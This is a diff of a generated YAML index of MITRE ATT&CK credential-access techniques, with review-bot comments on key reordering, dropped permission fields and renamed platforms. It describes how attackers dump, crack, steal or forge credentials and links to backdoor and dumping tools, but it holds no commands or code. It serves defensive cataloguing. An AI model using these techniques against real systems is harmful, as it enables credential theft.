- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
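Review bot: the roughly forty deleted lines here (contributors, platforms, `id`/`type`/`created`, the entire external_references list) are not removed from T1556.003 but re-emitted in the next hunk in a different key order, so the only semantic change in this hunk is `modified: '2022-05-11T14:00:00.188Z'` becoming `'2024-08-21T16:19:55.082Z'`. If the generator wrote keys in a fixed order (sorted, say) instead of upstream insertion order, future ATT&CK syncs would diff as the handful of real changes they are. Separately, and pre-existing in the context lines: the description is split mid-sentence after `pam_unix.so`, `/etc/passwd` and `/etc/shadow`, which reads like inline markup stripped by the generator rather than deliberate wrapping; worth its own fix.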
@@ -43478,20 +44103,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
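Review bot: `x_mitre_permissions_required:` / `- root` is deleted and nothing in the re-emitted block replaces it; the block gains `x_mitre_deprecated: false` and `revoked: false` instead, and the 2.0 to 2.1 version bump comes with no visible change to the description or detection text. Any consumer of index.yaml that filtered techniques or tests by `x_mitre_permissions_required` will find the key gone from every technique in this patch, so check the index generators and any docs that surface required privileges, and if the privilege level is still wanted for T1556.003 it has to come from somewhere else since this description never states it.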
@@ -43571,12 +44233,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43605,6 +44266,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -43616,18 +44278,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
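Review bot: the platform list for T1110.001 loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider` (version 1.5 to 1.6), and the same remap is applied to the other cloud techniques in this patch. Anything that selects techniques by the old platform strings (per-platform index builds, documentation filters, test-to-platform matching) will silently match nothing after this lands; grep the generator and CI for the three removed names and decide whether the Google Workspace and Azure AD specific outputs should key on the new labels or on the atomic tests' own platform metadata.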
@@ -43654,14 +44316,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43785,12 +44444,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43805,10 +44463,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -43816,14 +44475,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -43866,14 +44525,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -43928,14 +44584,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43986,14 +44641,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44027,8 +44681,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
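Review bot: the "External to DA, the OS X Way" reference moves from the plain-http `slideshare.net/StephanBorosh/...` link to the https `slideshare.net/slideshow/external-to-da-the-os-x-way/62021418` link with the retrieval date refreshed to September 12, 2024; the same slide deck is cited again under T1555.001 later in this patch, and the two entries should carry the identical new URL and date so the citations stay consistent (they do in the T1555.001 block below).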
@@ -44045,11 +44699,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -44067,7 +44720,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -44084,10 +44737,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44111,46 +44764,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -44171,65 +44790,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44238,6 +44854,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44245,31 +44864,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
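Review bot: the only prose edit in this hunk is `administrative Azure AD privileges` becoming `administrative Entra ID privileges` in the T1606.002 description, while the technique's platform list at this point still carries `Azure AD` and is only remapped in the following hunk, so both edits belong to the same upstream rename and should land together. Anything in the repo that pattern-matches technique names or descriptions on `Azure AD` needs a grep. The `x_mitre_permissions_required:` / `- SYSTEM` removal for T1003.004 at the top of the hunk is the same field drop as elsewhere in the patch; here at least the requirement survives in the description's opening sentence (`Adversaries with SYSTEM access to a host`).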
@@ -44282,14 +44933,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -44330,14 +44981,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
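Review bot: the T1003.007 description in the context line reads `/proc//maps` and `/proc//mem`, an empty path component where the process-id placeholder belongs, so the generator is discarding angle-bracketed text from the upstream description as if it were an HTML tag while keeping the surrounding backticks. This predates the hunk, but a regeneration PR is the right place to fix the stripping so the description comes out as a valid path pattern; the same symptom (sentences broken across lines around identifiers) shows up in several other descriptions in this file.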
@@ -44400,81 +45048,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
